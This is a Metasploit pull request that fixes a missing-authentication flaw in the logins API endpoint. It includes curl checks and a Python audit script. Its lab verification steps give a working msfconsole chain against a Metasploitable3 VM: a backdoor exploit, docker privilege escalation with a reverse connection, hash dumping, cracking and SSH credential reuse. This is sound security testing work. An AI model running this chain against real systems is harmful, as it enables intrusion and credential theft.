
Fix to add LoginServlet authentication #11183

Merged


mkienow-r7
Contributor

@mkienow-r7 mkienow-r7 commented Dec 28, 2018

The LoginServlet currently does not require authentication. This fix adds authentication to the LoginServlet endpoints introduced in #10176.

Get hosts or other models without authentication and note the error message:

$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/hosts" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    72  100    72    0     0   4500      0 --:--:-- --:--:-- --:--:--  4800
{
    "error": {
        "code": 401,
        "message": "Authenticate to access this resource."
    }
}

Get logins without authentication and a response is returned rather than an authentication error:
Note, the response is empty because there are no logins in the database.

$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/logins" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     2  100     2    0     0    142      0 --:--:-- --:--:-- --:--:--   142
[]

Ticket: MS-3699

Verification

Note, the verification steps are mostly duplicated from #10176.

Test login modules

The following steps will create and update login records.

  • Set up Metasploitable3 VM for testing
  • Start msfconsole
  • Create one or more valid credentials for Metasploitable3, for example, creds add user:vagrant password:vagrant
  • Test a successful login against a service
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database. Ensure valid credentials are displayed when running the creds command.
    • run
    • Verify the login attempt is displayed for the credential by running the creds command.
  • Test that logins are updated properly
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database. Ensure invalid credentials are displayed when running the creds command.
    • run
    • Verify the login attempt is displayed for the credential by running the creds command.
    • Turn off Metasploitable3 and run the module again to get a failed attempt.
    • Verify the login attempt displays for the credential. You may need to use the API for this because it is not displayed in the UI. I recommend using the GET command under Logins at http://localhost:8080/api/v1/api-docs. The login record should show a status of Unable to connect.

Test JTR modules

The following steps will create and update login records.

  • Create the following RC script:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST <IP address of Metasploitable3>
set RPORT 6697
exploit -z
sleep 5
sessions -u 1
sleep 5
use exploit/linux/local/docker_daemon_privilege_escalation
set SESSION 2
set LHOST <IP of listening address>
set LPORT 4445
exploit
  • Set up Metasploitable3 VM for testing
  • Start msfconsole
  • Run the RC script resource <RC Script Name>.rc
  • Verify you get a root shell and then background it
  • Gather Dump Password Hashes
    • use post/linux/gather/hashdump
    • set SESSION <root session ID>
    • run
  • Crack the hashes using John the Ripper Linux Password Cracker
    • use auxiliary/analyze/jtr_linux
    • Create a custom wordlist with at least Pr0t0c07
    • set CUSTOM_WORDLIST <wordlist file name>
    • set USE_DEFAULT_WORDLIST false
    • set USE_ROOT_WORDS false
    • run - this should successfully crack the c_three_pio hash
  • Verify the cracked creds are present when you run the creds command
  • Test successful logins against a service using the newly cracked creds
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database.
    • run
    • Verify the login attempts are displayed for the credentials by running the creds command.

Verify the content in the API docs

  • Verify that unauthenticated access to the Logins endpoints via the Swagger UI responds appropriately
  • Verify the Logins endpoints via the Swagger UI to ensure they are working correctly

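The two curl calls above are the whole test: hosts answers 401 with a JSON error envelope, logins answered 200 with data. As an added regression check (not code from this PR or the Metasploit framework), the script below probes each REST endpoint without credentials and flags any that return a 2xx, treating an empty `[]` as a leak just as the PR description does; the base URL, the self-signed-certificate handling (the equivalent of curl -k) and the endpoint list are assumptions.

```python
"""Added example (not PR or framework code): probe the Metasploit REST API
without credentials and flag endpoints that return data instead of a 401
envelope. Assumes BASE_URL serves a self-signed certificate (hence curl -k)."""
import json
import ssl
import urllib.error
import urllib.request

BASE_URL = "https://localhost:8080"  # assumption: local msf web service
ENDPOINTS = ["/api/v1/hosts", "/api/v1/logins"]  # hosts: known good; logins: fixed here

def fetch(base_url, path):
    """GET `path` with no credentials; return (status, body) even on HTTP errors."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # equivalent of curl -k for the
    ctx.verify_mode = ssl.CERT_NONE  # self-signed dev certificate
    req = urllib.request.Request(base_url + path, headers={"accept": "application/json"})
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()

def classify(status, body):
    """'enforced': 401 with the {"error": {"code": 401, ...}} envelope the API returns.
    'leak': any 2xx, even an empty list, since data came back with no credentials.
    'other': anything else (non-JSON, redirects, 5xx); needs a manual look."""
    try:
        parsed = json.loads(body)
    except ValueError:
        return "other"
    if status == 401 and isinstance(parsed, dict):
        err = parsed.get("error")
        if isinstance(err, dict) and err.get("code") == 401:
            return "enforced"
    if 200 <= status < 300:
        return "leak"
    return "other"

def audit(base_url=BASE_URL, endpoints=ENDPOINTS, fetch=fetch):
    """Map each endpoint to its verdict; `fetch` is injectable for offline tests."""
    return {path: classify(*fetch(base_url, path)) for path in endpoints}

if __name__ == "__main__":
    verdicts = audit()
    for path, verdict in verdicts.items():
        print(f"{verdict:9s} {path}")
    raise SystemExit(1 if "leak" in verdicts.values() else 0)
```

Run it before and after applying the fix: before, /api/v1/logins reports `leak`; after, every endpoint should report `enforced` and the exit status is 0.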
@jbarnett-r7 jbarnett-r7 self-assigned this Jan 7, 2019
@jbarnett-r7 jbarnett-r7 merged commit 66d0ffd into rapid7:master Jan 7, 2019
@mkienow-r7 mkienow-r7 deleted the MS-3699-add-login-servlet-authentication branch January 7, 2019 23:24
@jbarnett-r7
Contributor

Release Notes

Require authentication when accessing the /api/v1/logins endpoint.
